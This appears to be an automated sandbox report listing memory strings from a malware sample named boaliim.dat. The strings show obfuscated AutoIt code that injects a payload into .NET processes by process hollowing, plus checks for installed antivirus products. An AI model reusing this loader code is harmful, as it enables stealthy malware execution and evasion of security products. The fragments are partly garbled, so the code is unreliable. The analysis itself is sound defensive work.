Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9eb36e28b456c771ba794ea0el
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9cc0ceea6516a6b1cab98e8327cy
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9dd2de8a55d797c31aa90e1327cf
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9c71ce2a4516c7b23a3b4e02140b82
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9da3df3a9426c6725af97e9387c?
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 9fd2bf3bc5976752680b7d6, $_y0x3856f9c720ee97637d6621af97e8247c, "mtext", '')
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $_y0x3856f9fe2ff4bb477760319f = iniread($_y0x3856f9fd2bf3bc5976752680b7d6, $_y0x3856f9c720ee97637d6621af97e8247c, "k3ysx", '')
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $_y0x3856f9cc0ceea6516a6b0c = fileread(filegetshortname(@scriptdir & "\" & $_y0x3856f9eb36e28b456c771ba794ea0e))\|$
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $_y0x3856f9cc0ceea6516a6b0c = fileread(filegetshortname(@scriptdir & "\" & $_y0x3856f9eb36e28b456c771ba794ea0e))9?g
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $_y0x3856f9cc0ceea6516a6b0c = ($_y0x3856f9cc0ceea6516a6b0c)
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: func _reverse($_y0x3856f9dd11d4bc42717c329f)
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: local $_y0x3856f9c711ebad5e41 = stringlen($_y0x3856f9dd11d4bc42717c329f)40t
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ekrn.exe
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: msctf.dllk(
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9e720e1ad536c7b3aa8a6c63956956ba47a4d7cc22b1629~
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: byte inheritedaddressspace;byte readimagefileexecoptions;exe
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\windows\microsoft.net\framework\v2.0.50727\regasm.exe
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9da07ca89775d4d1787aaca0877a44687555378ea103029xe
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\users\user\appdata\local\temp\regsvcs.exeregsvcs.execw
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\c:\windows\microsoft.net\framework\v4.0.30319\regsvcs.exel5
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: local $_y0x3856f9c60fe3be51687b66f4a0 = dllopen("advapi32.dll")
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\windows\microsoft.net\framework\v4.0.30319\applaunch.exeenu
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: return $_y0x3856f9c720edad536c4d3ba38dbb0844917aa4776742c03727
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9da07ca89775d4d1a96adc6186ba046975e576de71a2c29exe
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: elseif fileexists($_y0x3856f9c720edad536c4d3ba38eeb3253b8) thend)
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: if $_y0x3856f9c711ebad5e41 < 1 then return seterror(1, 0, "")
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: func _stringbetween($s_string, $s_start, $s_end, $v_case = -1)
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $s_end = stringregexpreplace($s_end, $s_pattern_escape, "\\$1")9)
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $_y0x3856f9c60df5b1406c5a34b591d6 = $_y0x3856f9cf1ce2bc69[5]orv()
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dllstructsetdata($_y0x3856f9f82ff5f10441, 1, "current_user")4q7
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: local $_y0x3856f9da07ca89775d4d0683badb1e6aaf5580535368e60d27
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: return $_y0x3856f9c720edad536c4d3ba38dbd0844917aa4776742c037271
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $colitems = $owmi.execquery("select * from antivirusproduct"))
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: local $_y0x3856f9da07ca89775d4d1a96adc6186ba046975e576de71a2c29
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: func _runbinary_iswow64process($_y0x3856f9c61ef5a7537d61269f)ktp*
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 6toar1049wfld4e75
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: l $_y0x3856f9da11e4a0516a610c = dllstructcreate("char[" & $_y0x3856f9c711ebad5e41 + 1 & "]")015
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dllstructsetdata($_y0x3856f9da11e4a0516a610c, 1, $_y0x3856f9dd11d4bc42717c329f)
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: local $_y0x3856f9cf11f5ad4641 = dllcall("msvcrt.dll", "ptr:cdecl", "_strrev", "struct*", $_y0x3856f9da11e4a0516a610c)
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: if @error or $_y0x3856f9cf11f5ad4641[0] = 0 then return seterror(2, 0, "")p
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $_y0x3856f9c720edad536c4d3ba38dbd0857846dbb607175 = ($_y0x3856f9db20eeab5f7c770ab190e1334a967991 & "\microsoft.net\framework\v2.0.50727\regsvcs.exe")g
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $_y0x3856f9c720edad536c4d3ba38dbd0857846da9657f75 = ($_y0x3856f9db20eeab5f7c770ab190e1334a967991 & "\microsoft.net\framework\v2.0.50727\regasm.exe")~
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $_y0x3856f9c720edad536c4d3ba38dbd0844917aa4776742c03727 = ($_y0x3856f9db20eeab5f7c770ab190e1334a967991 & "\microsoft.net\framework\v2.0.50727\applaunch.exe")h
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $_y0x3856f9c720edad536c4d3ba38dbb0857846dbb607175 = ($_y0x3856f9db20eeab5f7c770ab190e1334a967991 & "\microsoft.net\framework\v4.0.30319\regsvcs.exe")c
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $_y0x3856f9c720edad536c4d3ba38dbb0857846da9657f75 = ($_y0x3856f9db20eeab5f7c770ab190e1334a967991 & "\microsoft.net\framework\v4.0.30319\regasm.exe")
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $_y0x3856f9c720edad536c4d3ba38dbb0844917aa4776742c03727 = ($_y0x3856f9db20eeab5f7c770ab190e1334a967991 & "\microsoft.net\framework\v4.0.30319\applaunch.exe")6v
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $_y0x3856f9c720edad536c4d21b18ce13c7ad23891 = ($
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c4574770c = dllstructcreate("byte[" & $_y0x3856f9c701f7bc59777c34aab1ea364184789b7f6849ec39371d648da99b77cc25 & "]")0
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: local $_y0x3856f9da06e2a9547d60269f = dllstructcreate("byte[" & $_y0x3856f9c701f7bc59777c34aab1ea364184789b7f6849ec393615648ea9a741d539c772 & "]", $_y0x3856f9de06c289745d400699b7ca007c)
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: local $_y0x3856f9c71deeb255577407a78ecb36518053, $_y0x3856f9de1ee8a15e6c77279296dd3652a56bbc774b
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: local $_y0x3856f9c718eeba446d7339879deb2540927991, $_y0x3856f9c718eeba446d73399590f5327ce
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $_y0x3856f9da07ca89775d4d0683badb1e6aaf5580535368e60d27 = dllstructcreate("char name[8];" & "dword unionofvirtualsizeandphysicaladdress;" & "dword virtualaddress;" & "dword sizeofrawdata;" & "dword pointertorawdata;" & "dword pointertorelocations;" & "dword pointertolinenumbers;" & "word numberofrelocations;" & "word numberoflinenumbers;" & "dword characteristics", $_y0x3856f9de1ee8a15e6c77279f)#
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $_y0x3856f9c71deeb255577407a78ecb36518053 = dllstructgetdata($_y0x3856f9da07ca89775d4d0683badb1e6aaf5580535368e60d27, "sizeofrawdata")/
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $_y0x3856f9de1ee8a15e6c77279296dd3652a56bbc774b = $_y0x3856f9de06c289745d400699b7ca007c + dllstructgetdata($_y0x3856f9da07ca89775d4d0683badb1e6aaf5580535368e60d27, "pointertorawdata")$
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $_y0x3856f9c718eeba446d7339879deb2540927991 = dllstructgetdata($_y0x3856f9da07ca89775d4d0683badb1e6aaf5580535368e60d27, "virtualaddress")(
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $_y0x3856f9c718eeba446d73399590f5327c = dllstructgetdata($_y0x3856f9da07ca89775d4d0683badb1e6aaf5580535368e60d27, "unionofvirtualsizeandphysicaladdress")7
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: if $_y0x3856f9c718eeba446d73399590f5327c and $_y0x3856f9c718eeba446d73399590f5327c < $_y0x3856f9c71deeb255577407a78ecb36518053 then $_y0x3856f9c71deeb255577407a78ecb36518053 = $_y0x3856f9c718eeba446d73399590f5327cq
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dllstructsetdata(dllstructcreate("byte[" & $_y0x3856f9c71deeb255577407a78ecb36518053 & "]", $_y0x3856f9de03e8ac4574770c + $_y0x3856f9c718eeba446d7339879deb2540927991), 1, dllstructgetdata(dllstructcreate("byte[" & $_y0x3856f9c71deeb255577407a78ecb36518053 & "]", $_y0x3856f9de1ee8a15e6c77279296dd3652a56bbc774b), 1))b
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: if $_y0x3856f9c718eeba446d7339879deb2540927991 <= $_y0x3856f9de0fe3ac427d6126889cf81544926f9a737e43c006 and $_y0x3856f9c718eeba446d7339879deb2540927991 + $_y0x3856f9c71deeb255577407a78ecb36518053 > $_y0x3856f9de0fe3ac427d6126889cf81544926f9a737e43c006 thenc
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $_y0x3856f9da1ce2a45f7b4034b1a0 = dllstructcreate("byte[" & $_y0x3856f9c71deeb2555a7326a3abea3b4a8253 & "]", $_y0x3856f9de1ee8a15e6c77279296dd3652a56bbc774b + ($_y0x3856f9de0fe3ac427d6126889cf81544926f9a737e43c006 - $_y0x3856f9c718eeba446d7339879deb2540927991))b
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: if $_y0x3856f9c81ce2a45f7b7321a3a0 then _runbinary_fixreloc($_y0x3856f9de03e8ac4574770c, $_y0x3856f9da1ce2a45f7b4034b1a0, $_y0x3856f9de14e2ba5f487d3ca88dd6, $_y0x3856f9de01f7bc59777c34aab1ea36418478817b734bc61d1f0360a489826b, $_y0x3856f9c703e6af597b4b = 523)n
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $_y0x3856f9cf2de6a45c41 = dllcall("kernel32.dll", "bool", "writepro" & "cessmemory", "handle", $_y0x3856f9c61ef5a7537d61269f, "ptr", $_y0x3856f9de14e2ba5f487d3ca88dd6, "ptr", $_y0x3856f9de03e8ac4574770c, "dword_ptr", $_y0x3856f9c701f7bc59777c34aab1ea364184789b7f6849ec39371d648da99b77cc25, "dword_ptr*", 0)
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: local $_y0x3856f9da07ca89775d4d1787aaca0877a44687555378ea103029, $_y0x3856f9c71ce2a4516c7b23a3b4e02140b8
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dllcall("kernel32.dll", "bool", "terminateprocess", "handle", $_y0x3856f9c61ef5a7537d61269f, "dword", 0)
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.1_none_2c87ca0024d60201\b
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: local $_y0x3856f9c70ae2a444794b = $_y0x3856f9de0fe3ac427d6126889cf80e - $_y0x3856f9de0fe3ac427d61268995eb0e
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $ci.cataloghint
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: s$ci.cataloghint
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: microsoft-windows-netfx4-us-oc-package~31bf3856ad364e35~amd64~~10.0.17134.1.cat
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: omicrosoft-windows-netfx4-us-oc-package~31bf3856ad364e35~amd64~~10.0.17134.1.cat6
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \registry\user\s-1-5-21-3853321935-2125563209-4053062332-1002\software\microsoft\windows nt\currentversion
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: l $_y0x3856f9da1ec28a69 = dllstructcreate("byte inheritedaddressspace;" & "byte readimagefileexecoptions;" & "byte beingdebugged;" & "byte spare;" & "ptr mutant;" & "ptr imagebaseaddress;" & "ptr loaderdata;" & "ptr processparameters;" & "ptr subsystemdata;" & "ptr processheap;" & "ptr fastpeblock;" & "ptr fastpeblockroutine;" & "ptr fastpebunlockroutine;" & "dword environmentupdatecount;" & "ptr kernelcallbacktable;" & "ptr eventlogsection;" & "ptr eventlog;" & "ptr freelist;" & "dword tlsexpansioncounter;" & "ptr tlsbitmap;" & "dword tlsbitmapbits[2];" & "ptr readonlysharedmemorybase;" & "ptr readonlysharedmemoryheap;" & "ptr readonlystaticserverdata;" & "ptr ansicodepagedata;" & "ptr oemcodepagedata;" & "ptr unicodecasetabledata;" & "dword numberofprocessors;" & "dword ntglobalflag;" & "byte spare2[4];" & "int64 criticalsectiontimeout;" & "dword heapsegmentreserve;" & "dword heapsegmentcommit;" & "dword heapdecommittotalfreethreshold;" & "dword heapdecommitfreeblockthreshold;" & "dword numberofheaps;" & "dword maximumnumberofheaps;" & "ptr processheaps;" & "ptr gdisharedhandletable;" & "ptr processstarterhelper;" & "ptr gdidcattributelist;" & "ptr loaderlock;" & "dword osmajorversion;" & "dword osminorversion;" & "dword osbuildnumber;" & "dword osplatformid;" & "dword imagesubsystem;" & "dword imagesubsystemmajorversion;" & "dword imagesubsystemminorversion;" & "dword gdihandlebuffer[34];" & "dword postprocessinitroutine;" & "dword tlsexpansionbitmap;" & "byte tlsexpansionbitmapbits[128];" & "dword sessionid")d
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $_y0x3856f9cf2de6a45c41 = dllcall("kernel32.dll", "bool", "readprocessmemory", "ptr", $_y0x3856f9c61ef5a7537d61269f, "ptr", $_y0x3856f9de1ec28a69, "ptr", dllstructgetptr($_y0x3856f9da1ec28a69), "dword_ptr", dllstructgetsize($_y0x3856f9da1ec28a69), "dword_ptr*", 0)
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dllstructsetdata($_y0x3856f9da1ec28a69, "imagebaseaddress", $_y0x3856f9de14e2ba5f487d3ca88dd6)f
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $_y0x3856f9cf2de6a45c41 = dllcall("kernel32.dll", "bool", "writepro" & "cessmemory", "handle", $_y0x3856f9c61ef5a7537d61269f, "ptr", $_y0x3856f9de1ec28a69, "ptr", dllstructgetptr($_y0x3856f9da1ec28a69), "dword_ptr", dllstructgetsize($_y0x3856f9da1ec28a69), "dword_ptr*", 0)$
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dllstructsetdata($_y0x3856f9da0dc886645d4a019f, "e" & "ax", $_y0x3856f9de14e2ba5f487d3ca88dd6 + $_y0x3856f9c70be9bc4261423aaf97fb1960b653)#
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dllstructsetdata($_y0x3856f9da0dc886645d4a019f, "rcx", $_y0x3856f9de14e2ba5f487d3ca88dd6 + $_y0x3856f9c70be9bc4261423aaf97fb1960b653),
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $_y0x3856f9cf2de6a45c41 = dllcall("kernel32.dll", "bool", "setthreadcontext", "handle", $_y0x3856f9c61aefba5579760c, "ptr", dllstructgetptr($_y0x3856f9da0dc886645d4a019f))
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $_y0x3856f9cf2de6a45c41 = dllcall("kernel32.dll", "dword", "resumethread", "handle", $_y0x3856f9c61aefba5579760c)
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dllcall("kernel32.dll", "bool", "closehandle", "handle", $_y0x3856f9c61ef5a7537d61269f)
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dllcall("kernel32.dll", "bool", "closehandle", "handle", $_y0x3856f9c61aefba5579760c)
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: return dllstructgetdata($_y0x3856f9da3ef5a7537d61269990e1314a9367a9627b43cd06, "processid")0
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: func _runbinary_fixreloc($_y0x3856f9de03e8ac4574770c, $_y0x3856f9da0ae6bc5141, $_y0x3856f9de0fe3ac427d6126889cf80e, $_y0x3856f9de0fe3ac427d61268995eb0e, $_y0x3856f9c807eaa9577d4a63f2a0)#
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: local $_y0x3856f9c718eeba446d7339879deb2540927991, $_y0x3856f9c71deeb255777417aa96ec3c7c, $_y0x3856f9c700f2a5527d601aa0bce12357886fbb4f
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: local $_y0x3856f9da0be9ba597d610c, $_y0x3856f9c70ae6bc5141, $_y0x3856f9da0fe3ac427d61269f
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: local $_y0x3856f9c708eba95741 = 3 + 7 * $_y0x3856f9c807eaa9577d4a63f2a0
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: while $_y0x3856f9c71ce2a4516c7b23a3b4e02140b8 < $_y0x3856f9c71deeb255410
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $_y0x3856f9da07ca89775d4d1787aaca0877a44687555378ea103029 = dllstructcreate("dword virtualaddress; dword sizeofblock", $_y0x3856f9de0ae6bc5141 + $_y0x3856f9c71ce2a4516c7b23a3b4e02140b8)$
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $_y0x3856f9c718eeba446d7339879deb2540927991 = dllstructgetdata($_y0x3856f9da07ca89775d4d1787aaca0877a44687555378ea103029, "virtualaddress")"
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $_y0x3856f9c71deeb255777417aa96ec3c7c = dllstructgetdata($_y0x3856f9da07ca89775d4d1787aaca0877a44687555378ea103029, "sizeofblock")
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $_y0x3856f9c700f2a5527d601aa0bce12357886fbb4f = ($_y0x3856f9c71deeb255777417aa96ec3c7c - 8) / 21
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $_y0x3856f9da0be9ba597d610c = dllstructcreate("word[" & $_y0x3856f9c700f2a5527d601aa0bce12357886fbb4f & "]", dllstructgetptr($_y0x3856f9da07ca89775d4d1787aaca0877a44687555378ea103029) + 8)
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $_y0x3856f9c70ae6bc5141 = dllstructgetdata($_y0x3856f9da0be9ba597d610c, 1, $_y0x3856f9c717)
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: if bitshift($_y0x3856f9c70ae6bc5141, 12) = $_y0x3856f9c708eba95741 then,
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $_y0x3856f9da0fe3ac427d61269f = dllstructcreate("ptr", $_y0x3856f9de03e8ac4574770c + $_y0x3856f9c718eeba446d7339879deb2540927991 + bitand($_y0x3856f9c70ae6bc5141, 0xfff))"
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dllstructsetdata($_y0x3856f9da0fe3ac427d61269f, 1, dllstructgetdata($_y0x3856f9da0fe3ac427d61269f, 1) + $_y0x3856f9c70ae2a444794b)"
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: func _runbinary_allocateexespaceataddress($_y0x3856f9c61ef5a7537d61269f, $_y0x3856f9de0fe3ac427d61269f, $_y0x3856f9c71deeb25541):
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: local $_y0x3856f9cf2de6a45c41 = dllcall("kernel32.dll", "ptr", "virtualallocex", "handle", $_y0x3856f9c61ef5a7537d61269f, "ptr", $_y0x3856f9de0fe3ac427d61269f, "dword_ptr", $_y0x3856f9c71deeb25541, "dword", 0x1000, "dword", 64)9
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $_y0x3856f9cf2de6a45c41 = dllcall("kernel32.dll", "ptr", "virtualallocex", "handle", $_y0x3856f9c61ef5a7537d61269f, "ptr", $_y0x3856f9de0fe3ac427d61269f, "dword_ptr", $_y0x3856f9c71deeb25541, "dword", 0x3000, "dword", 64)
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: func _runbinary_allocateexespace($_y0x3856f9c61ef5a7537d61269f, $_y0x3856f9c71deeb25541)3
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: local $_y0x3856f9cf2de6a45c41 = dllcall("kernel32.dll", "ptr", "virtualallocex", "handle", $_y0x3856f9c61ef5a7537d61269f, "ptr", 0, "dword_ptr", $_y0x3856f9c71deeb25541, "dword", 0x3000, "dword", 64)r
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: endfunc
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: endif"
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: next)
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: endfunc
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: endif
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: endifr
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: endfuncu
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: endfunc`
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: func _runbinary_unmapviewofsection($_y0x3856f9c61ef5a7537d61269f, $_y0x3856f9de0fe3ac427d61269f)r
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dllcall("ntdll.dll", "int", "ntunmapviewofsection", "ptr", $_y0x3856f9c61ef5a7537d61269f, "ptr", $_y0x3856f9de0fe3ac427d61269f)p
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: local $_y0x3856f9cf2de6a45c41 = dllcall("kernel32.dll", "bool", "iswow64process", "handle", $_y0x3856f9c61ef5a7537d61269f, "bool*", 0)`
